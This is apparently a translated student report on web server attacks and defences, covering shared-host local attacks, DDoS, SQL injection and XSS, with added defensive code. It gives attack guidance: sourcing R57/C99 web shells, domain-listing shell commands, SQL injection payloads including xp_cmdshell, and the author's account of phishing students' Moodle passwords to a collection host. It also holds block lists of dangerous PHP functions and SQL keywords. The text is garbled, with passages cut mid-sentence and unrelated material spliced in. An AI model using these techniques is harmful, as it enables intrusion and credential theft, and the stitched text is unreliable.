Topic: Web Server Attack and Defense
TABLE OF CONTENTS
CHAPTER 1: OVERVIEW OF WEBSITES, WEB SERVICES AND COMMON SECURITY FLAWS
  1.1. What a website is and how it works
  1.2. Web-based services and applications
CHAPTER 2: COMMON ATTACKS ON, AND SECURITY OF, WEB APPLICATIONS
  2.1. Local Attack
    2.1.1. About Local Attack
    2.1.2. How a Local Attack is carried out
    2.1.3. Defending against Local Attack
    2.1.4. Supporting tools
  2.2. Denial of Service
    2.2.1. DoS (Denial of Service)
    2.2.2. DDoS (Distributed Denial of Service)
    2.2.3. DRDoS (Distributed Reflection Denial of Service)
  2.3. SQL Injection
    2.3.1. SQL injection attacks
    2.3.2. Preventing SQL injection
  2.4. Cross Site Scripting (XSS)
    2.4.1. XSS attacks
    2.4.2. Prevention
  2.5. Botnet
    2.5.1. About botnets and how they spread
    2.5.2. Remediation
    2.5.5. Supporting tools
  2.6. Social Engineering
    2.6.1. Common scams
      Fake mail
    2.6.2. Other scams
  2.7. Sniffer
    2.7.1. About sniffer attacks
    2.7.2. Supporting tools
CHAPTER 3: DEMO
CONCLUSION
REFERENCES
This report surveys the most common attack techniques in use today, such as SQL Injection, Denial of Service and Local Attack, together with how to secure against and defend from these common attacks, at an overview level.
CHAPTER 1
OVERVIEW OF WEBSITES, WEB SERVICES AND COMMON SECURITY FLAWS
1.1. What a website is and how it works
A website is a site on the Internet where a business presents information and images about itself and its products and services (or any other information) so that customers can reach it from anywhere, at any time.
A website is a collection of web pages. When a business builds a website it is building many pages of information, product catalogs, services and so on. Three basic elements are needed to create a website:
- A domain name (domain).
- A place to store the website (hosting).
- The content of the information pages (web pages).
Some basic terms:
- A dynamic website is one backed by a database and supplied with a management tool (admin tool). Its characteristic is flexibility: information can be updated frequently and the site's components are easy to manage. Such sites are usually written in programming languages such as PHP, ASP.NET, JSP or Perl, with the database managed through SQL or MySQL.
- A static website is coded page by page in HTML, like a brochure; it has no database and no tool for managing the information on the site. Static sites are usually designed with software such as FrontPage or Dreamweaver. Their drawback is that the content is hard to change: changing it usually means changing the documents that carry that content.
CHAPTER 2
COMMON ATTACKS ON, AND SECURITY OF, WEB APPLICATIONS
2.1. LOCAL ATTACK
2.1.1. About Local Attack
Local attack is a very common kind of hack, and one that is not to be encouraged. On an ordinary web server, when you register an account on some server you are given an account on that server and a directory in which to manage your site, for example servername/youraccount. Other users have accounts in the same way, for example servername/account1. Suppose account1 is taken over by a hacker: the hacker can then use tricks, scripts and command sequences to reach across into the directory holding your site, servername/youraccount. In the same way the hacker can attack the sites of other users, obtain the admin account, the database and other sensitive information, or insert malicious code into the index page of your site. This form of attack is called a Local Attack.
Most commonly a Local Attack is used to obtain the victim's config file; the hacker then uses the information in that config, according to their own aims, to damage the website.
2.1.2. How a Local Attack is carried out
There are different ways to perform a Local Attack depending on the hacker's approach. Most commonly hackers use command sequences to attack the database.
2.1.2.1. Preparation
- First a PHP/ASP/CGI backdoor is needed on the server. There are many kinds of backdoor, but the most common are phpRemoteView (usually called remview), R57Shell, CGITelnet and C99.
The tools above, usually shells such as R57 or C99, are uploaded to the server.
- One of these tools is uploaded to the host (R57, C99 and the like are usually used because they are powerful and easy to use).
There are several ways to get a host:
+ Buy a host (hackers rarely do this, for several reasons, the basic one being that it costs money and, if the server admin notices the uploaded shell, the host is deleted). With this method the shells should be deleted as soon as the Local Attack is finished.
+ Hack a vulnerable site and upload a shell to it (usually the hacker uses SQL Injection to hack a website, take over its admin account and upload shells), or exploit a file inclusion flaw.
+ Search for backdoors (search Google for keywords such as <?phpRemoteView?> or r57Shell). With this method most of the shells found belong to other hackers and have not yet been removed; if possible we should upload a separate shell of our own.
2.1.2.2. Carrying out the attack
Once the preparation is complete, that is, a shell has been uploaded to some server, we start looking for websites on the same server where the shell was uploaded. Hackers usually run a reverse IP lookup on the domain where the shell was uploaded to see the websites on the same server.
Having obtained the list of websites, each one is checked in turn to see whether it is vulnerable and can be reached from the shell.
Common commands used in the shell for a Local Attack:
To view the domain names on the same host:
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia
In the special case where the users on the same host cannot be listed, append && to
- ifconfig <interface>: shows detailed information about the network interfaces; Ethernet interfaces are usually named eth0, eth1 and so on. You can set network parameters such as the IP address with this command (see man ifconfig). If something is wrong you can stop or start an interface with ifconfig <interface> down or ifconfig <interface> up.
- passwd: lets you change a password (passwd alone changes the password of the user who owns it; passwd <user> changes another user's password if you are logged in as root).
- useradd: lets you add a new user (see man useradd).
Whatever the distribution, you can use the TAB key to auto-complete a command or file name, which is very useful once you are familiar with the commands. You can also use the up and down arrow keys to scroll through previously entered commands. Several commands can be placed on one line; for example, to create three directories on a single line the syntax could be: mkdir dir_1 ; mkdir dir_2 ; mkdir dir_3.
Another useful feature is the pipe: the output of one command can be passed through another. For example, man mkdir | tail prints the last lines of the manual page of mkdir.
If at some point you are required to log in as the root account (the system's "super" administrator), you can do so temporarily with the su command. The -l option (su -l, or simply su -) gives a login shell, switching to root's home directory and environment for the commands that follow. Note that you will be prompted for a password.
To exit or close the session, type exit or logout.
2.1.3. Defending against Local Attack
To limit Local Attack we should chmod the file manager tree, move the config.php file, edit the .htaccess file and, above all, back up data regularly.
- Chmod the file manager:
+ chmod the public_html directory to 710 instead of the default 750; this protects the structure of your website. (Mode 710 keeps the execute bit for the group, so the web server can still traverse into the directory, but removes group read, so other accounts sharing that group can no longer list its contents.)
+ Continue by chmodding the subdirectories; for example, for diendan (http://diendan.doanchuyennganh.com), chmod the diendan directory to 701, then
PHP safe mode is a way of addressing security on servers that share hosting among many accounts (shared servers). It is a misguided attempt to solve the problem at the PHP level, but today many people, ISPs in particular, choose to enable safe mode for security.
Caveat: safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, so on current PHP versions it no longer exists. The controls that remain are open_basedir, disable_functions and running each account's PHP under its own system user (for example, one PHP-FPM pool per account).
The Security and Safe Mode configuration directives are:
Code:
safe_mode                   default "0"                 changeable in PHP_INI_SYSTEM
safe_mode_gid               default "0"                 changeable in PHP_INI_SYSTEM
safe_mode_include_dir       default NULL                changeable in PHP_INI_SYSTEM
safe_mode_exec_dir          default ""                  changeable in PHP_INI_SYSTEM
safe_mode_allowed_env_vars  default "PHP_"              changeable in PHP_INI_SYSTEM
safe_mode_protected_env_vars default "LD_LIBRARY_PATH"  changeable in PHP_INI_SYSTEM
open_basedir                default NULL                changeable in PHP_INI_SYSTEM
disable_functions           default ""                  changeable in php.ini only
disable_classes             default ""                  changeable in php.ini only
To enable safe mode, in php.ini change:
safe_mode = Off to safe_mode = On
disable_functions should contain the following functions:
PHP Code:
readfile, system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close,
proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit,
escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source, ini_alter,
virtual, openlog
For example, with these files:
Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
and script.php containing:
PHP Code:
<?php
readfile('/etc/passwd');
?>
the result is:
Warning: readfile() has been disabled for security reasons in /docroot/script.php on line 2
A further advantage of enabling safe mode: uploaded files normally land in /tmp/ owned by a user other than the script owner, and safe mode's ownership checks then stop scripts belonging to other accounts from using them.
Enabling safe mode is inconvenient for PHP developers, so they usually write:
PHP Code:
<?php
// Check whether safe mode is on
if (ini_get('safe_mode')) {
    // code path used when safe_mode is enabled
} else {
    // code path used when safe_mode is disabled
}
?>
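The following Python script is an added example, not code from the report, showing the two controls that replace safe mode on a shared host: a directory-containment check of the kind open_basedir performs, and an audit of the permissions recommended in 2.1.3 (config.php not readable by other accounts, public_html without group read). The two-account tree it builds under a temporary directory and the account names user1 and user2 are constructed for the example.

```python
import os
import stat
import tempfile

# Directory containment in the spirit of PHP's open_basedir: accept a path only
# if, after resolving ".." and symlinks, it lies inside one of the allowed bases.
def within_basedir(path, basedirs):
    real = os.path.realpath(path)
    for base in basedirs:
        base_real = os.path.realpath(base)
        if real == base_real or real.startswith(base_real.rstrip(os.sep) + os.sep):
            return True
    return False

# Permission audit of one account's tree. Flags directories other users can
# write to (o+w) and files other users can read (o+r); a readable config.php is
# reported separately because that is what a local attack goes after.
CONFIG_NAMES = ("config.php", "wp-config.php", "configuration.php")

def audit_tree(root):
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            p = os.path.join(dirpath, name)
            mode = os.lstat(p).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                findings.append(("world-writable-dir", p))
        for name in filenames:
            p = os.path.join(dirpath, name)
            mode = os.lstat(p).st_mode
            if stat.S_ISLNK(mode) or not mode & stat.S_IROTH:
                continue
            kind = "readable-config" if name in CONFIG_NAMES else "world-readable-file"
            findings.append((kind, p))
    return findings

# Constructed two-account tree: <root>/user1/public_html and <root>/user2/public_html,
# each holding a config.php with the usual 644 mode (readable by everyone).
def build_demo_tree():
    root = tempfile.mkdtemp(prefix="shared-host-")
    for user in ("user1", "user2"):
        docroot = os.path.join(root, user, "public_html")
        os.makedirs(docroot)
        cfg = os.path.join(docroot, "config.php")
        with open(cfg, "w") as fh:
            fh.write("<?php $db_pass = 'sample-only';\n")
        os.chmod(cfg, 0o644)
        os.chmod(docroot, 0o750)
    return root

def demo():
    root = build_demo_tree()
    user1_docroot = os.path.join(root, "user1", "public_html")
    cfg = os.path.join(user1_docroot, "config.php")
    before = [kind for kind, _ in audit_tree(os.path.join(root, "user1"))]
    # Hardening from 2.1.3: config.php 600, public_html 710 (the group keeps the
    # traverse bit so the web server can still reach files, but cannot list).
    os.chmod(cfg, 0o600)
    os.chmod(user1_docroot, 0o710)
    after = [kind for kind, _ in audit_tree(os.path.join(root, "user1"))]
    # Containment: user1's PHP may open its own config, but not user2's via "..".
    traversal = os.path.join(user1_docroot, "..", "..", "user2", "public_html", "config.php")
    return {
        "before": before,
        "after": after,
        "own_config_allowed": within_basedir(cfg, [user1_docroot]),
        "traversal_allowed": within_basedir(traversal, [user1_docroot]),
    }

if __name__ == "__main__":
    print(demo())
```

Run against a real account directory, audit_tree() lists every file another local user could read; the realpath step in within_basedir() is what defeats the ../../otheruser form of traversal that a local attack relies on.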
- Securing the Apache server:
First, the place of Apache in the request chain:
Client (hacker performing a local attack) ------> Shared server
Shared server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... processing ...
PHP/Perl (returns result) -----------------> Apache
Apache (returns result) ------------------> Client
The effective permissions are therefore those Apache itself is set up with; they do not depend much on the applications behind it such as PHP or CGI.
Installing Apache:
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
(pw is the FreeBSD user-management tool; on Linux the equivalent commands are groupadd and useradd.)
By default Apache's processes run under the user nobody (except the main process, which must run as root) with the GID of the group nogroup. This can lead to serious security threats: after a successful break-in, an attacker can gain access to the other processes running under the same UID/GID. The optimal solution is therefore to run Apache under a UID/GID from a separate group dedicated to that software alone.
Anyone used to *nix is familiar with UID/GID from the topic of file permissions, but the detail deserves a little expansion for readers who are not. Two details in the group and user created for Apache above deserve attention:
-d /dev/null: the Apache user is given no $HOME directory, unlike ordinary users.
-s /sbin/nologin: the Apache user is given no shell at all. Some setups use -s /bin/true instead of nologin; true is a command that does nothing and is completely harmless.
The reason for giving the Apache user neither a $HOME nor a shell is that even if this account is compromised, the attacker gets no opportunity to reach the system at the level needed for privilege escalation. On *nix in general the shell is the interface between the user and the system; without a shell there is no such access. If the setup above gave the Apache user a $HOME and allowed it a shell, it would be worth nothing from a security standpoint.
Go to http://httpd.apache.org/ and install the latest version (2.2 at the time of writing).
We should then set the permissions of each PHP shell separately, so that it has no right to jump into other users' accounts.
[Figure: classification of DDoS attack networks]
DDoS attack-network
- Agent-Handler model: Client-Handler communication over TCP, UDP or ICMP
- IRC-based model: Client-Handler communication over TC P, UDP or ICMP, through a secret/private channel or a public channel
[Figure 2.3. Architecture of an Agent-Handler attack-network: the Attacker controls several Handlers, each Handler controls several Agents, and the Agents attack the Victim]
From the Client, the Attacker communicates with the Handlers to determine how many Agents are online, to adjust the time of the attack and to update the Agents. Depending on how the attacker configures the attack-network, the Agents are managed by one or several Handlers.
The Attacker usually places the Handler software on a router or on a server carrying a lot of traffic, so that the communication between Client, Handler and Agents is harder to detect. This communication usually takes place over TCP, UDP or ICMP. The real owners of the Agent machines are usually unaware that they are being used in a DDoS attack, either through lack of knowledge or because the Backdoor Agent programs use so few system resources that almost no effect on system performance can be seen.
ii. The IRC-based model:
Internet Relay Chat (IRC) is a multi-user online chat system that lets a user open a multipoint connection to many other users and chat in real time. The architecture of an IRC network consists of many IRC servers across the Internet, communicating with each other over many channels. An IRC network lets users create three kinds of channel: public, private and secret.
Public channel: lets every user of the channel see the IRC names and receive the messages of every other user on the same channel.
Private channel: designed for communication among permitted parties. Users outside the channel cannot see the IRC names and messages on it. However, a user outside the channel can learn of the existence of a private channel with certain channel locator commands.
Secret channel: like a private channel, but it cannot be found with a channel locator.
[Figure 2.4. Architecture of an IRC-based attack-network: the Attacker issues commands through the IRC network to the Agents, which attack the Victim]
An IRC-based network is similar to an Agent-Handler network, but this model uses IRC channels as the means of communication between Client and Agents (no Handler is used). With this model the attacker also gains several other advantages:
- The communication takes the form of chat messages, which makes detecting it extremely difficult.
- IRC traffic can move across the network in large volumes without arousing suspicion.
- There is no need to maintain a list of Agents: the hacker only has to log on to the IRC server to receive the status reports the Agents send to the channel.
- Finally, IRC is also a file-sharing environment, which makes it easy to spread the Agent code to many more machines.
[Figure: classification of DDoS attacks]
DDoS attack
- Bandwidth Depletion
  - Flood Attack
    - UDP: Random Port Attack, Static Port Attack (Spoof Source Attack or Direct Attack)
    - ICMP (Spoof Source Attack or Direct Attack)
  - Amplification Attack
    - Smurf attack (Spoof Source Attack)
    - Fraggle Attack (Spoof Source Attack, Loop Attack)
- Resource Depletion
  - Protocol Exploit Attack
    - TCP SYN Attack (Spoof Source Attack)
    - PUSH+ACK Attack (Spoof Source Attack)
  - Malformed Packet Attack
    - IP Address Attack
    - IP Packet Options Attack
...the target's service. This method generates unnecessary traffic and depletes the target's bandwidth.
Flood attack:
In this method the Agents send a large volume of IP traffic that slows the target's service, hangs the system or drives it into a saturated state, so that the system's real users can no longer use the service.
Flood attacks can be divided into two kinds:
+ UDP Flood Attack: because UDP is connectionless, a system receiving UDP messages simply accepts every packet it has to process. A large number of UDP packets sent to the target's service pushes the whole system to its limit.
+ These UDP packets can be sent to many arbitrary ports or to a single port. Usually they are sent to many ports, forcing the target to stretch itself to demultiplex and handle them. If the attacked port has no service ready, the target sends back an ICMP destination port unreachable packet. Agent software normally uses forged source IP addresses to hide its tracks, so the replies for unserved ports are sent to some other IP address. A UDP flood can also affect connections around the target, because the convergence of packets on it is so heavy.
+ ICMP Flood Attack: ICMP was designed for network management and for locating network devices. When the Agents send a large volume of ICMP ECHO_REQUEST (ping) packets to the target, the target has to answer with an equal number of ECHO_REPLY packets, congesting the link. As above, the Agents' IP addresses may be forged.
+ Amplification Attack:
An amplification attack abuses the IP broadcast support of routers to amplify and reflect the attack. This feature lets a sender specify a single broadcast address for an entire receiving subnet instead of many addresses; the router then delivers the broadcast packet it receives to every IP address in that subnet.
The attacker can send the broadcast messages directly or through a number of Agents in order to increase the intensity of the attack. If the attacker sends the messages directly, the systems inside the broadcast network can be exploited as Agents.
[Figure: amplification attack: the Attacker/Agent sends packets to an amplifier network; the systems in the amplifier network reply to the Victim]
+ Fraggle Attack: like the Smurf attack, but instead of ICMP ECHO REQUEST packets it sends UDP ECHO packets to the target. There is also another variant of the Fraggle attack that sends UDP ECHO packets to the target's chargen port (port 19 on UNIX) with the source address set to the target's echo port (port 7 on UNIX), creating an infinite loop. The attacker launches the attack with an ECHO REQUEST whose destination is a broadcast address; every system on that address immediately sends a REPLY to the victim's echo port, the victim then sends an ECHO REPLY back to the broadcast address, and the process repeats. This is why the Fraggle attack is far more dangerous than the Smurf attack.
ii. Resource depletion attacks (Resource Depletion Attack)
By definition, a resource depletion attack is one in which the attacker sends packets that use protocols in ways contrary to their design, or packets intended to clog network resources, so that those resources can no longer serve other, ordinary users.
a/ Protocol Exploit Attack:
+ TCP SYN Attack: the Transmission Control Protocol provides reliable delivery and therefore uses a handshake between sender and receiver before data is transferred. First, the sender sends a SYN (synchronize) packet. If the receiver gets the SYN it replies with a SYN/ACK packet. Finally, the sender transmits the last packet, ACK, and begins sending data. A SYN attack exploits this: the attacker sends SYNs (usually from forged addresses) and never completes the handshake, so the server is left holding half-open connections until its connection backlog is full.
[Figure: left, the normal TCP three-way handshake between a TCP client (client port 1024-65535) and a TCP server (service port 80, in the range 1-1023): SYN, SYN/ACK, ACK. Right, a SYN attack: the Attacker/Agent sends a stream of SYNs and the server answers each with a SYN/ACK]
+ IP packet options attack: randomizes the OPTIONS field of the IP packet and sets all the QoS bits to 1, forcing the victim's system to spend time analysing each packet; with a large number of Agents this can exhaust the victim's processing capacity.
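The detection side of the flood and SYN attacks described above, as an added example that is not part of the report: a small half-open connection tracker over a packet summary trace. The trace format ("time src:port > dst:port flags") and the addresses in it are constructed for this example; the point it shows is that a SYN flood is visible as many SYNs whose handshake never completes, typically from many distinct (forged) sources, which is what the page's description of forged Agent addresses predicts.

```python
from collections import defaultdict

# One line per TCP packet summary: "<time> <src ip:port> > <dst ip:port> <flags>"
# where flags are S (SYN), SA (SYN/ACK) or A (ACK). The trace below is
# constructed for this example, not a real capture.
def constructed_trace():
    lines = [
        "0.000 10.0.0.5:40001 > 192.0.2.10:80 S",      # a normal handshake
        "0.001 192.0.2.10:80 > 10.0.0.5:40001 SA",
        "0.002 10.0.0.5:40001 > 192.0.2.10:80 A",
    ]
    # Flood: ten SYNs from ten forged sources; the server answers each with
    # SYN/ACK, but the third packet of the handshake never arrives.
    for i in range(10):
        src = "203.0.113.%d:%d" % (i + 1, 1025 + i)
        lines.append("%.4f %s > 192.0.2.10:80 S" % (0.010 + i * 0.001, src))
        lines.append("%.4f 192.0.2.10:80 > %s SA" % (0.0105 + i * 0.001, src))
    lines += [
        "5.000 10.0.0.6:40002 > 192.0.2.10:80 S",      # a later normal handshake
        "5.001 192.0.2.10:80 > 10.0.0.6:40002 SA",
        "5.002 10.0.0.6:40002 > 192.0.2.10:80 A",
    ]
    return "\n".join(lines)

def parse_trace(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _, dst, flags = line.split()
        records.append((float(ts), src, dst, flags))
    return records

# Half-open accounting: a client's SYN opens a pending entry keyed by
# (client, server); the client's ACK closes it. Entries still pending after
# `timeout` seconds (measured against the last timestamp in the trace) are
# counted per server endpoint, along with the distinct source IPs behind them.
def half_open_by_server(records, timeout=1.0):
    pending = {}
    now = records[-1][0] if records else 0.0
    for ts, src, dst, flags in records:
        if flags == "S":
            pending[(src, dst)] = ts
        elif flags == "A":
            pending.pop((src, dst), None)
    counts = defaultdict(lambda: {"half_open": 0, "sources": set()})
    for (client, server), ts in pending.items():
        if now - ts >= timeout:
            counts[server]["half_open"] += 1
            counts[server]["sources"].add(client.rsplit(":", 1)[0])
    return counts

# Flag a server whose stale half-open count exceeds the threshold. Many
# distinct sources is consistent with forged Agent addresses rather than with
# a single misbehaving client.
def detect_syn_flood(records, threshold=5, timeout=1.0):
    alerts = []
    for server, info in half_open_by_server(records, timeout).items():
        if info["half_open"] > threshold:
            alerts.append({"server": server, "half_open": info["half_open"],
                           "distinct_sources": len(info["sources"])})
    return alerts

if __name__ == "__main__":
    for alert in detect_syn_flood(parse_trace(constructed_trace())):
        print(alert)
```

The threshold and timeout are tuning knobs: on a real server the backlog size (the kernel's SYN queue) sets the scale at which half-open connections start costing service, so the alert threshold should sit well below it.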
c/ Some characteristics of DDoS attack tools:
[Figure: characteristics of DDoS attack software]
- Agent setup
  - Installation: active; passive (bugged website, corrupted file)
  - Agent activation methods: actively poll; live and wait
  - OS supported: Unix
  - Installation vectors: backdoor, trojan, buffer overflow
- Attack-network communication
  - Agent-Handler: Client-Handler, Agent-Handler
  - IRC-based: private/secret channel, public channel
  - Protocol: TCP, UDP, ICMP
  - Encryption: yes, no (none)
HANDLER COMMAND SET
Command             Description
Log On              Log on to the Handler software (user + password)
Turn On             Activate the Handler so that it is ready to receive commands
Log Off
Turn Off
Initiate Attack     Start the attack on the designated target
List Agents         Ask the Handler to list the Agents under it
Kiss Agents         Remove an Agent from the ranks of the attack-network
Add victim          Add an attack target
Download Upgrades   Update the Handler software (download file.exe and execute it)
Set Spoofing
Set Attack Time
Set Attack Duration
BufferSize          Set the Agent's buffer size (to increase the Agent's power)
Help                Program usage guide
AGENT COMMAND SET
Command             Description
Turn On             Activate the Agent so that it is ready to receive commands
Turn Off            Instruct the Agent to stop, if it is scanning
Initiate Attack
Download Upgrades
Set Spoofing
Set Attack Duration
Set Packet Size
Help
d. Some DDoS tools:
On the common basis described above, many tools have been written; they are usually open source, so they grow ever more complex and many novel variants appear.
* Agent-Handler DDoS tools:
- Trinoo: one of the first widely distributed DDoS tools. Trinoo has an Agent-Handler architecture and is a Bandwidth Depletion tool using UDP flood. The first versions of Trinoo did not support IP address spoofing. The Trinoo Agent was installed by exploiting a remote buffer overrun. It ran on Solaris 2.5.1 and Red Hat Linux 6.0. The attack network communicates over TCP (attacker client to Handler) and UDP (Handler to Agent); communication between Client, Handler and Agent is protected with symmetric encryption.
- Tribe Flood Network (TFN): Agent-Handler architecture; a DDoS tool supporting both Bandwidth Depletion and Resource Depletion attacks, using UDP flood, ICMP flood, TCP SYN and Smurf attacks. The first versions did not support IP address spoofing; the TFN Agent was installed by exploiting a buffer overflow. It ran on Solaris 2.x and Red Hat Linux 6.0. The attack network communicates with ICMP ECHO REPLY packets (TFN2K adds TCP/UDP with a selectable protocol) and the communication is not encrypted (TFN2K adds encryption).
- Stacheldraht: a variant of TFN with the added ability to update Agents automatically. Communication between Attacker and Handler is a symmetrically encrypted telnet session.
- Shaft: a variant of Trinoo; Handler-Agent communication runs over UDP, Attacker-Handler over telnet (TCP). It attacks with UDP, ICMP and TCP floods and can combine several kinds at once. Detailed statistics let the attacker see the state of damage at the victim and the scale of the attack, in order to adjust the number of Agents.
* IRC-based DDoS tools:
IRC-based DDoS tools were developed after the Agent-Handler tools. However, IRC-based DDoS tools are far more complex, because they integrate many characteristics of the Agent-Handler tools.
%>
In normal situations this code displays the article whose ID matches the one given, and hardly any error is visible. However, just like the login example earlier, this code is open to another SQL injection. An attacker can replace a valid ID by assigning ID a different value and thereby begin an illegitimate attack, for example 0 OR 1=1 (that is, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1). The SQL query now returns every article in the table, because the statement executed is:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Another case is a search page that lets the user enter search terms such as first name and last name. The code commonly looks like:
Code:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _
vAuthorName & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
%>
...will certainly be vulnerable to SQL injection, because if we enter into the first field, for example, ' + (SELECT TOP 1 FieldName FROM TableName) + ', the query becomes: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). Then, when the stored record is viewed, it is as if you had asked for one more statement to be executed: SELECT TOP 1 FieldName FROM TableName.
iv. Attacks using stored procedures
An attack through stored procedures does enormous damage if the application runs with the system administrator account 'sa'. For example, if we change the injected code to the form: ' ; EXEC xp_cmdshell cmd.exe dir C: '.
...such as:
Code:
<%
' Double every single quote so that user input cannot close the SQL string literal
Function EscapeQuotes(sInput)
    sInput = Replace(sInput, "'", "''")
    EscapeQuotes = sInput
End Function
%>
Where the input is numeric, the flaw comes from replacing a value expected to be a number with a string containing illegitimate SQL. To avoid this, simply check that the data has the right type with the IsNumeric() function.
In addition, a function can be built to strip certain dangerous characters and keywords, such as ;, --, select, insert and xp_, from the string received from the user, to limit this kind of attack:
Code:
<%
Function KillChars(sInput)
    Dim badChars, newChars, i
    badChars = Array("select", "drop", ";", "--", "insert", "delete", "xp_")
    newChars = sInput
    ' Replace is case-sensitive by default; vbTextCompare makes it catch SELECT as well as select
    For i = 0 To UBound(badChars)
        newChars = Replace(newChars, badChars(i), "", 1, -1, vbTextCompare)
    Next
    KillChars = newChars
End Function
%>
Such a blacklist is only a supplement, never a replacement for type checking and parameterised queries: it is easy to bypass (a keyword nested inside another copy of itself, for instance, is reassembled by a single removal pass) and it also mangles legitimate input that happens to contain one of the words.
ii. Configuring the database management system securely
There must be strict control over, and limits on, the data-handling rights of the account the web application uses. Ordinary applications should avoid rights such as dbo or sa: the more restricted the rights, the smaller the damage.
To reduce the risk from SQL injection attacks, also take care to remove any technical information from the messages returned to the user when the application fails. Ordinary error messages reveal technical details that can let an attacker learn the system's weak points.
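The two injections above (the numeric ID in product.asp and the quoted AUTHOR_NAME in the search page) beside the fixes recommended in 2.3.2, as an added example that is not code from the report. It uses an in-memory SQLite database with constructed rows in place of the report's T_NEWS and T_AUTHORS tables; the payload "0 OR 1=1" is the page's own, the quoted one is the same idea applied to a string field.

```python
import sqlite3

# In-memory stand-in for the report's T_NEWS and T_AUTHORS tables, with
# constructed sample rows.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER PRIMARY KEY, TITLE TEXT)")
    conn.executemany("INSERT INTO T_NEWS VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    conn.execute("CREATE TABLE T_AUTHORS (AUTHOR_ID INTEGER PRIMARY KEY, AUTHOR_NAME TEXT)")
    conn.executemany("INSERT INTO T_AUTHORS VALUES (?, ?)",
                     [(1, "Nguyen"), (2, "Tran")])
    return conn

# Vulnerable: the request parameter is pasted into the SQL text, exactly as
# product.asp does with ID. "0 OR 1=1" turns the WHERE clause into a tautology.
def news_vulnerable(conn, news_id):
    sql = "SELECT * FROM T_NEWS WHERE NEWS_ID=" + news_id
    return conn.execute(sql).fetchall()

# Fixed: the IsNumeric-style type check from 2.3.2 plus a bound parameter, so
# the value is never interpreted as SQL.
def news_safe(conn, news_id):
    if not news_id.isdigit():
        raise ValueError("NEWS_ID must be an integer")
    return conn.execute("SELECT * FROM T_NEWS WHERE NEWS_ID=?", (int(news_id),)).fetchall()

# Vulnerable string field, as in the author-search page: a quote in the input
# closes the literal and the rest of the input becomes SQL.
def author_vulnerable(conn, name):
    sql = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME='" + name + "'"
    return conn.execute(sql).fetchall()

# Fixed: a bound parameter; a quote inside the name is just data.
def author_safe(conn, name):
    return conn.execute("SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME=?", (name,)).fetchall()

def demo():
    conn = make_db()
    tautology = "0 OR 1=1"            # the payload from product.asp?ID=0 or 1=1
    quoted = "nobody' OR 1=1 --"      # closes the quote, then comments out the rest
    out = {
        "news_vulnerable_rows": len(news_vulnerable(conn, tautology)),
        "author_vulnerable_rows": len(author_vulnerable(conn, quoted)),
        "author_safe_rows": len(author_safe(conn, quoted)),
    }
    try:
        news_safe(conn, tautology)
        out["news_safe_rejected"] = False
    except ValueError:
        out["news_safe_rejected"] = True
    out["news_safe_legit_rows"] = len(news_safe(conn, "2"))
    return out

if __name__ == "__main__":
    print(demo())
```

The same pattern applies to ADO on the ASP side: an ADODB.Command with a Parameters collection plays the role of the "?" placeholders here, and the database account used for the connection should have only SELECT on the tables the page needs, as 2.3.2 recommends.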
2.4. Cross Site Scripting (XSS)
2.4.1. XSS attacks
Cross-Site Scripting (XSS) is one of the most common attack techniques today, and also one of the important security problems for web developers and web users alike. Any website that lets users post information without strictly checking for dangerous code can harbour XSS flaws.
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that inserts into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script that can harm other users. The dangerous code inserted is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and can also consist of HTML tags. XSS quickly became one of the most common flaws in web applications, and the threat it poses to users keeps growing. The winner of the eWeek OpenHack 2002 contest was the person who found two new XSS flaws.
Occasionally a website is vulnerable to XSS but no popup appears; then you have to view the page source. When viewing the source, look for the line <script>alert('XSS')</script>; if it is there, the page has XSS.
Suppose http://doannguyennganh.com/index.php is a site vulnerable to XSS and we find the vulnerable spot to be http://doannguyennganh.com/index.php?page=<script...</script>, meaning we can insert code straight from the address bar.
Step 5: Plan the attack scenario
ii. The attack
There are many attack techniques based on XSS flaws; essentially, once people know how to find the hole, each has their own pattern for the attack. Here I present a technique I carried out successfully on the Moodle site of the Faculty of Information Technology at KHTN: a password-stealing technique.
After confirming that the Moodle site had an XSS flaw at the login page, I immediately wrote a small application and uploaded it to a free host; its job was to receive the student ID and password sent to it and write them to a text file. How they are received is described next.
Step 1: I create a fake e-mail saying: "Intel recruitment forum, anyone interested is invited to take part", with a fake link, http://doannguyennganhgia.com/index.php, which actually refers to a fake page of mine. In an instant this page attaches a script whose job is to collect the username and password after login and injects it into the real page (the real page has the XSS flaw, so it lets us attach malicious code; "attach" here means that when we view the page's source we see our script at the top), then immediately redirects to the real page so as not to raise suspicion.
Step 2: The user reads the mail, takes it for real, clicks the link and sees the genuine Moodle page load (they have no idea that the real page has had malicious code attached; it happens so fast that they suspect nothing, although anyone who looked closely would see that the link is wrong).
